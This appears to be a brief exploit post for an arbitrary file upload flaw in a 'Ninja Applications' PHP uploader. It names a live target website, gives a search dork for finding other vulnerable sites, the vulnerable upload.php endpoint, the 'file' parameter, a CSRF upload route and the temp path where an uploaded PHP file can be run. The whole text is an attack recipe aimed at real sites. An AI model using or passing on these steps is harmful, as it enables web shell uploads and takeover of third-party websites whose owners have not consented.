Ninja Applications Arbitrary File Upload
Ninja Applications Arbitrary File Upload
Live TARGET : https://stickeroid.com/
Dork : inurl:/ninja-applications/fufu/
exloit :/ninja-applications/fufu/controllers/uploader/upload.php
example : https://stickeroid.com
/ninja-applications/fufu/controllers/uploader/upload.php
Vuln:
{"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}
Upload With CSRF
Paramter :"file"
access ur file in : /uploads/temp/randomname.php
